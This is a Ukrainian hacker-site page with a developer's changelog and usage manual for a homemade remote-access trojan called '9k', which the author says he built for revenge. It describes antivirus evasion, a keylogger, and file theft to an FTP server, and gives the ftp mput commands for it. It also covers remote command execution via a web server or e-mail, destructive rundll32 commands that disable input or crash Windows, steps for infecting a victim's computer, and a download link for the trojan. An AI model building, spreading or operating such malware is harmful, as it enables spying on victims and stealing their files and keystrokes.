UA-Hack – комп`ютерний маг

Сторінка в процесі розробки.

9k 0.9 sever alpha
21.11.09 18:00

Автор: drv

Захист : обхід всіх антивірусних програм і фаєрволів, і ін. (*)
Основні функції : автозапуск (*)
зображення з буферу по зліб
архівація файлів
пробема з віддаленим встановленням тексту на ураженій системі
скріншот (хібащо зберегти в файл і надіслати на сервер)
ну це ФТП
мод: лог
мод: інтерфейс
команди dir та tree додати до сервісних команд (реалізація за допомогою компонентів хіасму і окремих він-команд)
редактор файлів (також з він і без він)
мод: конф – файли або длл
регулятор гучності
прослуховування звуків з колонок
винести інфу з буфера в окремий файл
чат з жертвою?????
захоплення зображення з веб-камери
зміна зображення на робочому столі
(ОК)українська мова в getfile (вроді є)
файлова система у вигляді дерева
echo ftp && echo open && …
ring 0

Нотатки

Зміна значення в параметрі ключика щодо вмонтованого у Windows XP потребує перезавантаження системи.
Клавіатурний шпигун потребує файл hook.dll
Клавіатурний шпигун (функція автозбереження) по стандарту вимкнено
Буфер обміну (зображення) – необхідно додумати, як це зробити, і віришити, чи викор. це…
В системі інформації першого типу в файл з інформацією видається чомусь вся схема або її частина програми в поток
Команда виконується із частим інтервалом!!!! Увага! Це може привести до фатальних наслідків
E: && cd photo && tree && dir – так необхідно взнавати щось про файли
Для пробивки інфи про оперативку і іншу корисну інфу також можна використовувати не сервісні команди, а команду systeminfo (команда для командного рядка ОС Windows)
Клавіатурний шпигун працює з недоліком: якщо жертва натисне 1 і триматиме клавішу наприклад 5 секнуд, то в неї буде купа одиничок, а шпигун буде бачити тільки одну одиничку.
розмір файлу, який передається на сервер командою getfile не резиновий…

бібліотеки джпег і хук
Зразу на сервері? Просто в неті? В самому файлі?

GET http://127.0.0.1/command.1 HTTP/1.0 коннект і зразу запит
серв=айпі суто

Працювати з ftp на ураженій системі найкраще буде так (команда prompt вимикає інтерактивний режим. Тобто непотрібно аж такої взаємодії з користувачем):
ftp
prompt
o 127.0.0.1
root
1
mput C:\Wallpaper1.bmp

Програма rar для архівації файлів в архіви rar. Синтаксис:
rar a files.rar C:\www\

Для перегляду того, що є на носіях інформації найкраще робити це таким чином:
E: && cd photo && tree && dir

cmd = !@windows comands!@
service commands = !#service commands for trojan-server!#
text of message = !$text!$
get file = !%file!%

log
02.01.09 10:58 Так, зараз, напевне, щось буде… =))))) Керування процесами? =))

31.12.09 22:15 Схоже, що троян все ж досі виконує одну й ту саму команду купу разів…

31.12.09 12:29 Усунено проблему, через яку троян не міг надіслати файл на сервер із локальних папок, в яких міститься крапка.

29.12.09 22:08 Тепер троян не буде виконувати кожних 10 секунд одну й ту саму команду. Відразу після прийому команди, троян змінює зміст файлу з командами на сервері.

27.12.09 12:08 Додано функцію “знущання над ураженою системою” =)) Покищо в це знущання входить можливість вимкнути монітор (ну і звісно назад увімкнути). Зараз буде трохи більше функцій.

26.12.09 22:07 Додано можливість отримати список всіх дисків (локальних, флоппі-дисків, CD/DVD приводів, віртуальних приводів, віддалених дисків, тощо). Інфа про кожен диск виглядає таким чином : буква диску, об`єм диску, вільне місце, зайняте місце і мітка диску (назва).

25.12.09 21:50 Хто б міг подумати, що це буде так важко…

25.12.09 21:33 Додається система віддаленого вводу тексту. В ході додавання виникають деякі труднощі… Очевидно, що аокищо можна буде писати або тільки великими або тільки маленькими буквами…

22.12.09 21:23 Остаточно дороблена система прийому команд через e-mail а також відправка результатів і файлів кейлогера та системи інформації. Відправка цих файлів також через e-mail. Якщо буде бажання – зроблю ще підтримку маіл.ру агента… Але то наврядче…

22.12.09 16:48 Об`єднання технології 7k з технологією 9k. Коротше тепер троян 9k вміє ще й працювати через e-mail. Вав, як там і було. Схоже, що керування по е-маілу буде досить корисною функцією. Дозволяє керувати прямо з мобіли, що мене дуже виручить при випробуваннях і в реальних умовах!

21.12.09 19:06 Так, вкотре тестую троян… Дійшов до висновку, що все працює. Єдине, що треба акуратно працювати із командами до віндовса. Мене особисто цікавить найбільше команда приблизно такого вигляду : D: && dir && tree , і коли я її виконував декілька раз підряд – троян вирубувався. Але, якщо виконати її один раз (як то би й мало бути) то все буде добре. Отже, все ОК! І ще, зараз я ще працюю над трояном 7k. Все точно так само, як в 9k, але команди приймаються з поштової скриньки. Тобто керування можна проводити напряму з мобіли, в якій є підтримка інтернету, і звісно вона відповідним чином налаштована.

19.12.09 10:** Дурний троян…

19.12.09 10:15 Так, схоже… Я переробив троян. Я знайшов хитріший спосіб виконання віндосівських команд. Тепер вони не будуть виконуватись кожних 10 чи скільки там секунд. Я змінив приорітети команд. Було : віндосівські команди на першому місці, сервісні – другорядні. Стало навпаки. Віндосівськи команди тепер викон. таким чином: сервісна команда win1 або win2 , і в старій масці має бути необхідна команда (!@format d:!@). Зараз будемо пробувати… =))

18.12.09 21:16 Блін!!!!! Більше 3 прийомів файлу вепер не буває – або просто вирубується троян, або повідомлення про помилки а тоді вирубується! Але, зараз я перебодую алгоритм, і все буде гаразд!

18.12.09 20:31 Є. Файл command.cmd вилітає =))) Більше він нам не знадобиться. Отже, глюків повинно бути менше! Дивимось….

18.12.09 20:26 Інколи сам з себе дивуюсь : “Людська тупість безмежна…” Походу, зараз буде прорив з трояном!!!

17.12.09 22:11 Хм… глюки далі… Нестабільно все… Правда глючать тільки команди до віндоса… А сервісні працюють безвідмовно!

15.12.09 19:04 О-о-о… =))) Так би й зразу, а то тута якісь помилки вискакують… А зараз все ок! І простіше все стало, і не глючить… =))) (То із Спанджбоба (не подумайте нічого зайвого =))) ) ) “Ах, какой же я все-таки хороший…” =))) Тепер можна спокійно проводити випробування…

15.12.09 18:31 Ох ти ж йолки… Знову він за своє! Знову виконує не більше однієї команди… І ще й скотина не читає укр. мови…

15.12.09 16:42 З запитом ніяк не вдавалось… Але проблему вирішено. І ще й додано підтримку проксі.

13.12.09 **:** Випробування не проводились. Мені відразу щось підказувало, що вони б провалились… Справа в тому, що весь той час троян розроблявся для роботи із іменно певним сервером… А коли я попробував попрацювати з нормальним сервером – капут! =)) Нічого не працює. Зараз ведуться роботи із побудовою рядка запиту до сервера, щоб той у відповідь надіслав файл.

03.12.09 21:23 Додано функція “сувенір на пам`ять” =))) . Коротше можна копіювати файли з ураженого компа прямо на ftp-сервер. Така операція здійснюється сервісною командою.

03.12.09 20:11 На даний момент триває об`єднання інформаційних систем трояну і підготовка трояну для першого випробування в реальних умовах, яке відбудеться на цих вихідних (5 або 6 грудня 2009 року).

03.12.09 19:01 Додана функція “повідомлення жертві”. Переглянутий функціонал. Оптимізовано код. Тестування. Розширення функіоналу.

03.12.09 18:40 Покищо особливих змін небуло. Так, тільки трохи оптимізував, потестував…

02.12.09 21:11 Не хочу задирати носа, але )))))) Але доведеться. Схоже, що я в подвійній перемозі. Я зумів усунути проблему, і надати трояну нормальну працездатність, а друге – я ще й зумів вмонтувати функцію надсилання результату команд без особливих проблем і всяких там фуфлових прибамбасів))))))) Корочє всьо пучьком =))))))))))) Декілька останніх штрихів, і подивимся, що можна зробити… Це все, малята, на сьогодні все! Страшних снів, і мокрого ліжечка зранку )))))))))))))))) (Не звертайте уваги. Просто в автора трояну і відповідно й цього тексту дуже сильно перевтомився розум. Він днями і ночами без перестанку сидів за тим трояном, і тому в його так “рубає”) =)))) %))))

02.12.09 21:01 Мта… Складно щось робити в “білій гарячці”… Схоже, що я відновив роботу трояну і усунув критичну помилку трояну. Можливо робота трону є трохи паршивою, але щоб бути впевненим у виконанні команди просто необхідно почекати! На даний момент триває тестування. Троян вже працює декілька хвилин в так званих амплітудних умовах. Вилітання не спостерігається. Критичну помилку усунено. Схоже, що все ОК. Інколи команди затримуються, але це все ж краще, ніж те, що було (а був отвір від бублика)

02.12.09 20:05 Стан трояну майже не змінився. Хоч я його “завів”, але побачив критичну помилку, через яку припиняється подальше виконання команд. Намагаюсь усунути. Але роблю перерву.

02.12.09 20:03 Нотатки з 01.12.09 : Я вивів з ладу свій троян, і познаходив купу помилок в роботі. Покищо троян в непрацездатному режимі.

01.12.09 21:25 Я закінчив робити домашнє завдання, і зараз здурію від злості!!!! Виявляється, що остання проблема була не в трояні, а в тому, що … Неважно… Але це було чисто придурочно. Працюю далі. Бачу, що до 22:00 не встигну…

01.12.09 20:25 Ууу…… Недовго я радувався… Троян вже не вирубується, але більше одної команди виконувати не хоче… Зробимо паузу.

01.12.09 20:14 Упс… Щось я не пригадую, щоб у функції мого трояну входило автовимикання на 4 секунді роботи…

01.12.09 19:55 Так точно, Сер! Результати команд реалізовано і протестовано. =))

01.12.09 19:38 Про команди dir, tree та інші – забудьте. Я оптимізував роботу трояну, що дозволяє йому працювати в нормальному режимі. Тобто це (напевне) дозволить отримувати результати (відповіді) від команд, які будуть викон. на ураженій ОС.

01.12.09 19:03 Ну що ж, раз в мене є трохи вільного часу, трохи бажання, трохи солодкої водички ))), трохи настрою, і раз сьогодні моє свято (1 грудня – Романа) =))), то я вже піднажму, і розроблю версію 0.9 трояну 9k. Через декілька годин буде реалізований такий відносно мінімальний функціонал. Покищо робота йде над:

“E: && cd photo && tree && dir – так необхідно взнавати щось про файли
У зв`язку з тим, що троян не може давати результат команд (покищо не може), і у звязку з тим, що є деякі команди, які власне й виконуються, щоб отримати певну відповідь, деякі команди переходять у групу сервісних команд. Покищо це команди dir та tree.”

29.11.09 близько 13:40: Після падіння у відчай =))) і повного відпаду бажання повернутись до розроблення, я все ж відкрив схему трояну і подумав, а що, якщо? Якщо з`єднати ці дві точки і ці дві… (в результаті я реалізував усі попередні невдалі вирішення в одне єдине. Причому воно було дуже простим. Якщо на попередні вирішення йшло пів години, то на це пішло пів хвилини…) В результаті я отримав вирішення проблеми. Троян працює. Назву змінено з UaH-troj (Ua-Hack-trojan) на 9k. Просто так коротше і гарніше. Робота над троянчиком відновлюється, і незабаром вийде 9k 0.9 =))).

після 25.11.09: розроблення трояну припинено через зіткнення із фатальною проблемою: опрацювання однієї і цієїж команди одна за одною закінчувалось припиненням роботи трояну. Тимчасовим вирішенням було очищення файлу з командою, або ігнорування команди, якщо вона однакова до тої, яка перед тим вже виконалась. Жодне з цих рішень не допомагало. Обмеження функціоналу мене також не влаштовувало.

від 21.11.09 приблизно від 18 години ДО приблизно 25.11.09: активне розроблення схеми трояну

21.11.09 близько 12 години ранку: ідея створити такий троян. Насамперед – троян я хотів зробити вже давно, але ніяк не здогадувався, як саме його зробити. Надихнули мене на це дві особи. Хто саме – це немає жодного значення. Чому надихнули – ну… ))) Кажуть, що помста солодка. А ще кажуть, що помста тільки на початку солодка, а потім “бє”… )))) Коротше – хотів помститись і трохи порозважатись.

До трояну входять:

Основа: TCP клієнт
Основа2: Записувачі інформації в пам`ять, умовні блоки (компоненти для порівняння двох команд (в даному випадку) )
Основа3: Деякі компоненти, які використовуються для запису/очищення файлів, виконувач файлів, таємним чином перероблений на виконувач команд
Допоміжні елементи: таймери (затримки строго не рекомендую використовувати, бо то просто туфта!), шукачі блоків, інформаційні елементи, редактори реєстру, менеджери файлів, тощо.

Функції і властивості:

1. Перше, і саме основне – віддалене виконання команд до ОС Windows, через WEB-сервер.
2. Є ще сервісні команди, які створені іменно для керування роботою трояну і деякими його другорядними функціями. Знову ж таки через web-сервер (та тут все працює через web-сервер).
3. Наявність клавіатурного шпигуна.
4. Можливість отримати деяку відносно важливу інформацію про комп`ютер та ОС ураженої системи без використання віндосовських команд. (інфа про: що в буфері, оперативка, процесор, поточний користувач, ім`я комп`ютера, список всіх режимів монітора, інформація про шпалери на робочому столі, і ще декілька незначних…)
5. Можливість написати жертві повідомлення, яке з`явиться в неї на екрані у вигляді діалогового вікна (ну типа, таке, як помилка).
6. Скажений прорив порівняно з першопочатковим принципом і кодом. Для гарнатії, введено два типи виконання команд самої ОС.
7. Принцип роботи мало чим відрізняється від роботи браузера, отже середня можливість реакції антивірусних та схожих програм.
8. Це швидше демонстрація принципу роботи, ніж високотехнологічний і високофункціональний троян. Він всеж створювався для приватного використання, а не для публічного.
9. Троян відкритокодний, отож ви можете доробити/переробити його під свої потреби. Єдине, що він написаний на hiasm`і, а це покищо мало відома штукенця… (це ваші проблеми і турботи)
10.

Випробування № 1 .

Умови: керування відбуватиметься з комп`ютера деякого “Інтернет-клубу”. Ураженою системою буде звичайнісінький домашній комп з непрямим з`єднанням з нетом (уражений комп – локальна мережа – комп – модем – Інтернет) і з ОС Windows 7. На компі встановлена антивіруска, яка саме – це немає значення. Троян працюватиме не в прихованому режимі, а в нормальному. Все відбувається з відома власника ураженого компа.

Хід роботи
Початок 0*.12.09 о **:**

Сервісні команди

1.reboot – перезавантаження системи
2.shutdown – вимкнення системи
3.message – надсилання повідомлення жертві (незабудьте вказати текст)
4.getfile – отримати файл з ураженої системи (незабудьте вказати ім`я файлу)
5.keystart – запуск авто збереження натиснутих клавіш В ФАЙЛ key.log
6.keystop – зупинка авто збереження натиснутих клавіш В ФАЙЛ key.log
7.keysave – зберігти список натиснутих клавіш в key.log
8.black – не реалізовано (екран гарно темніє)
9.get – троян надсилає на сервер файл 1.1 (файл з інформацією про уражену систему)
10.info (зокрема буфер)
11.win1
12.win2
13.monitor1
14.monitor0
15.text
16.wallpaper
17.mailget
18.

Віндосовські команди

systeminfo
xcopy
Taskkill
Tasklist
move
copy
md
del

rundll32 user32,SwapMouseButton – поменять местами клавиши мыши

rundll32 user32,SetDoubleClickTime n – задать скорость двойного нажатия левой кнопки мыши (Double Click), соответствующую параметру n

rundll32 user32,ExitWindowsExec – быстрая перезагрузка Windows.

rundll32 user,disableoemlayer -сбой системы (!) – отключаются все функции ввода-вывода (клавиатура, дисплей, мышь). Будет черный экран с курсором и не реагирующая система, Windows продолжает работать.

rundll32 url.dll,FileProtocolHandler http://ua-hack.com – открыть веб-страницу, где %1 – URL сайта (включая http://).

rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintTestPage – распечатать тестовую страницу.
rundll32 shell32,SHExitWindowsEx 8 – выход из Windows и выключение ATX-совместимого ПК.
rundll32 shell32,SHExitWindowsEx 4 – принудительно закрыть все программы.
rundll32 shell32, SHExitWindowsEx 2 – перегрузить ПК.
rundll32 SHELL32, SHExitWindowsEx 1 – перегрузить оболочку Windows.
rundll32 shell32, SHExitWindowsEx 1 – выключить ПК.
rundll32 shell32,SHExitWindowsEx 0 – закрыть все программы, перегрузить оболочку.
rundll32 krnl386.exe,exitkernel – выгрузить ядро системы, выход из Windows.
rundll32 mouse,disable – отключение мыши до перезагрузки.
rundll32 keyboard,disable – отключение клавиатуры до следующей перезагрузки.

Інструкція по використанні трояну:

Насамперед – потрібно сервер, або місце (папка) на сервері, до якого є доступ по ftp і http звісно… І доступ повинен бути таким, що можна й редагувати і створювати файли на сервері.

Далі – на сервері або в папці на сервері повинен бути файлик з командами (зазвичай – command.1).

Потім – троян повинен бути налаштованим на роботу із даним сервером (повинен бути прописаний сервер, логін і пароль до логіна)

Ну і звісно – ураження системи. Тут якби нічого супер-складного (ну звісно для досвідчених перців ))))) ). Просто запустити троян від імені ураженої системи (тобто врубати трой на компі жертви). Чи потрібно адмінські права? Ну… Буде такий мод трояну, що адмінські права будуть непотрібні (та вони, здається, ітак не потрібні)..

Останнню РОБОЧУ версію трояну можна завантажити тут: http://test9k.host-ua.org.ua/9k-server.sha